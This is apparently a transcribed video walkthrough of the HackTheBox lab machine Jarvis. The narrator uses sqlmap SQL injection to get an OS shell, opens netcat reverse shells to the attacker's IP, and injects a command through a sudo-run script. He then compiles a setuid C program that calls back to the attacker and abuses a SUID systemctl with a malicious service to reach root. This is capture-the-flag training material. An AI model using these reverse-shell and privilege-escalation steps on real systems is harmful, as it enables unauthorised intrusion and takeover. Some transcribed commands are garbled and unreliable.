Hello and welcome, guys. And this tutorial video we'll be looking at the HackTheBox machine called Jarvis. So very easy box. Requires we find a web application running on PHP, and then we find out that this web application is vulnerable to SQL injection. We get a shell on the box, has www.data, and then we find out that www.data can actually execute commands as the user Pepper, and we're able to exploit a web application or a Python script, which we can then use to become the user Pepper. And then privilege escalation to root requires just doing some enumeration on the box, finding out that we have an SUID file or binary, and then we exploit that to become root. So first things first, we do SCSV, and then the IP address of Jarvis is 10.10.10.143. So I've already done the scan, and if you do cat scan, we can see we've got SSH on port 2222 and an Apache web servers running on port 80. So we're going to have a look at this real quick. Paste and go. We find a web application called Stack Hotel, and we could go on to the rooms. We see it's running on PHP, and we could see when we click on each room, we see these rooms. We could see the code parameter here changing from 1 to 2 for each of the rooms, 3 to 4 to 5 to 6. So my initial thought was maybe we should just run SQL map on this and see what happens. So going here, I'm going to do SQL map -u, put in the URL --dbs --batch, and run this with SQL map. So it says it looks like the backend DBMS is running MySQL. So that's a good thing, and also tells us that the code parameter might be injectable. So we're just going to wait for the results. Of SQL map. Taking longer than I anticipated, but so it looks like the backend in DBMS is MySQL, and get parameter appears to be and Boolean based blind injectable. And there we go. So we see the databases: hotel, MySQL performance schema, and information schema. So my mind comes across that hotel is going to be the backend database. And we could see the web server is running Linux Debian, MySQL, backend DBMS. So we can run this command again, and this time around, we give it the database. So I'm going to use the D flag, give it hotel, and I'm going to use the OS shell command to put a web shell on the box. So click on this, and straight away we can see we got a shell. So if we do ID, we can see we are www.data. If I do stuff like cat/etc /pswd, we can now see we got a user called Pepper on the box, and this is the box. So I could do uname-a, and we can see straight away Linux Jarvis, and so we have a shell on the box. However, this isn't the proper shell, so what I'm going to do is I'm going to get a proper shell. So MVLP 9001, always on top, and then we're going to do which netcat here, and we see we've got netcat installed, so we can do nc dash. First of all, I'm going to need to get my IP address. So if config it's on 0, That's my IP address, so copy that. So I could then cat this, paste that in, 9001-E/bin sh. So click on here, we get a shell on the box ID. So which Python? So we've got Python installed, so we could do Python -c import pty.pty semicolon pty.spawn, and then do bin bash. Think everything is right, unless we've lost the shell. So ls, yes, we still got a shell on the box. Well, for some reason this isn't connecting. So I'm just going to open that shell once again, run our commands, and it says critical error, appears we've been banned on the box. So if we go back here and we try to refresh this, it says you've been banned for 90 seconds. So it appears to be a sort of a web application firewall on the box that tries to find out if anything, malicious is going on, and bans us from the box. So it appears we've lost the shell, and I might have to try this again after 90 seconds. So I'm just going to keep refreshing to see after 90 seconds. Hopefully we should be back online, and then we execute what we did earlier before. So we already know the backend database is called hotel. We got a shell as www.data, but somehow we got kicked out by the web application firewall. So we just need to try this again. Okay, so I'm just going to clear history, clear recent history, clear now, open up another terminal or another window, 143, stays we're still banned. So we're back online, so let's just run our SQL map once again and see what we come up with. So we get a shell, we're back, and we're going to run the same bin sh. We get a shell, and then we do Python -c. Just need to copy that straight away. There's no need typing that again. So paste that here. Right, I can see where the error is. So it appears it's here. I think there was a typo there. So let's send it again. We get a shell. And what we needed to have done is, so I need to just type this again, Python -c imports pty.pty semicolon pty.spawn, then bin bash, close the quotes, and then so we have w.data, so export term equals screen, and then we should be able to clear export term equals screen, I believe. So clear screen. So we're able to clear screen now, right? So got a shell on the box, and if we do sudo -l, we see that the www.data on Jarvis, user www may run the following commands on Jarvis as user pepper. So we have the script that we can run. So in order to run the script, we could do sudo and then put in the script, but we have to use as the user pepper, so we can use -u user pepper and then provide a script, and then we run the script. It says options. We can actually use any of these options. So what I did next was to do this, use the -p parameter, and it says enter IP. So we could just do $/bin bash, and we should be able to get a shell as the user pepper. And straight away we can see now we are pepper. So if we do command like ID, I found out that the command just echoes back. So if you do stuff like who am I, we see straight away it just echoes back without giving us the standard output. So what I did in this scenario was to open another window, always on top, make this a bit bigger, and open another shell. So nc-nvlp 9002, and then we could do the same thing we did before. So an endcat, our IP address, let's get that again, if config on 0, 10.10.14.148. Okay, so we can do netcat that 9002 as the port -e/bin sh. So make sure we've got our listener open there. Click on this, we get a shell ID. You can see we use a pepper, so we could do Python again -c import pty.spawn and /bin bash. Okay, so with the user pepper now, and now when we do command like list, we can see stuff straight away. So here we could just go to the user's home, see the pepper, and do a list. We could see we got the user txt, so we could do wc-c user.txt, and we got the user flag. So 32 characters with line space, 32 characters for the MD sum, and also line space, making it 33. So I could do export term equals screen, and should be able to clear screen. Yeah, we can. Okay, so now the next thing I did was to do a sort of recon on the box. So let's just minimize this, go in here and do Linux privilege escalation. There's one I actually like about this by Payatu. So I'm just going to do Control F, search for SUID, and there's a command we can use here to search for SUID binaries. So here, I'm just going to copy this into this terminal, search for SUID binaries. And you can see straight away we find a couple of ones. I think I should have reverted this box. However, we can see one here, which is bin system control. So this is the binary that is used to start and stop services, I believe, on Linux. So if we do ls-l on this file, we see it is red, and we can see it belongs to the user root, and also anyone in the group called Pepper. So it means Pepper, our user, which is Pepper, can actually execute this binary as user root. So the next thing I did was to go to a very good site, which is GTF beans, I think. Beans. And I think GTFO beans, I think. Yeah. And then we could search for that binary, so system. And if we go here, we notice that we can actually, it runs with the SUID bit set and may be exploited to access the file system. So it says we need to create a service and then echo this command into the service, create a symbolic link between that service we created, and then use that system control binary to enable that service. And whatever we put into the execute start parameter here would get called as the root user. So that's exactly what we're going to do. So in order to do this, I'm just going to open another terminal on my box. I've got an SUID binary which I like using, so I'm just going to locate it. So locate exploit.c. I think I've got it in one of the zipper. So I'm going to come here. Let's make this a bit bigger. And I'm going to cd atb, cd Jarvis, and I'm going to copy this exploit file here. So we're going to do nano exploit.c. Okay, so here is just a small program written in C. So we've got the standard libraries, main, set UID 0, set group ID 0, and then system called bin bash. However, I'm not going to let it call bin bash. What I'm going to do is I'm going to let it execute netcat. So I'm going to do this 10.10.14.148, which is our IP address. I'm going to give it 9003-E, then bin sh. So that is what this binary is going to be doing. So Control X. So that looks okay. If we come in here now, we can see if we do uname-a, we can see this is actually a Linux box that is a 64-bit operating system. So in order to compile our scripts, we're going to do gcc-m64 exploit-c, and I'm going to call the output file exec. So that's compiled, and then so let's have a look. Where are we? We're in Pepper's directory. So which wget? We have wget installed. So I'm just going to start up a simple HTTP Python HTTP service here on port 80. And then we're going to use wget to download the file. So wget http 10.10.14.148 / exec, got the file. For do a list-l exec, got the file, and then we can make exec executable. So we do chmod -x exec. So that's executable now. So if we do list exec, you can see it's gone green. So that's fine. So I'm going to stop my service here. So next thing I'm going to do is go back here and just copy these out. So copy this command. Just going to make some changes here. So I'm going to go in here and do this. I'm going to call the temporary file I want to create Jarvis, or the service Jarvis.service, echo service. So I'm going to make some big changes here. So we could do echo to bracket unit, I think. Let me just do a quick Google search. So create Linux service, see what we get. I'll create a Linux service. So, right, okay, so turn to a server unit description, blah, blah, blah. Okay, so let's just copy this part of what we need. Go back in here, space this here, make some changes. So system description, I'm just going to call it exploit service. After network service, we might leave that out. And I think they should do it. So go unit, this Jarvis service. So we come in here, we do touch Jarvis.service. So we create the malicious service. So we've got that service. I'm just going to make the service executable as well. So Jarvis.service. Okay, so here the output is going to be home-pepper/Jarvis, and the command is going to be calling the file home, the binary that we pulled down. So home pepper /exec, which is the SUID binary. So just going to copy all of this, copy this, come in here, and I think that should do. Click on enter. So if we do cat this file now, you can see the contents of it, unit description service this. So going back to execute this, we go to /bin where we got the SUID binary. If we do a list, system CTL, I believe, you can see that's the binary we want to exploit. Now all we have to do is open up another terminal and start our nc-nvlp and 9003, and then go back in here. So we have to create a symbolic link. So we do system CTL and then link to our service. So this is our service name. Copy this in, click on enter, and it says symbolic link, create a symbolic link. So the next thing is then to execute this. So we can do system CTL enable -- now, and then the name of the service, which is this. So before that comes back in, I'm just going to make sure this is right up there. Paste in the service name, click on enter, and we get a shell. So if we do ID, we root. So we could do python-c import pty-pty .spawn. So I'm just going to talk through what we just did here. So we are root. So we do cd root and then ls. So we can see probably this is the SQL defender that allowing us to get banned. Root.txt, and that's the root flag. So what we did here was, we created a malicious binary that executes netcat to give us a reverse shell, which we named exec, and we got down to onto the system, and then we exploited the system control SUID binary following the description in this very good blog post that gives us access to what we needed to do. So all we needed to do was to create a service which we created called Jarvis, and then within the service, we tell the service to execute the malicious binary we created in Pepper's directory. So we create a symbolic link between the system control, and once we enable the system control service to start the service, it starts our malicious service and gives us a reverse shell to port 9003. So very easy box, pretty straightforward as well. And I hope you enjoyed it, and I shall see you next time. Thanks for watching, and bye now.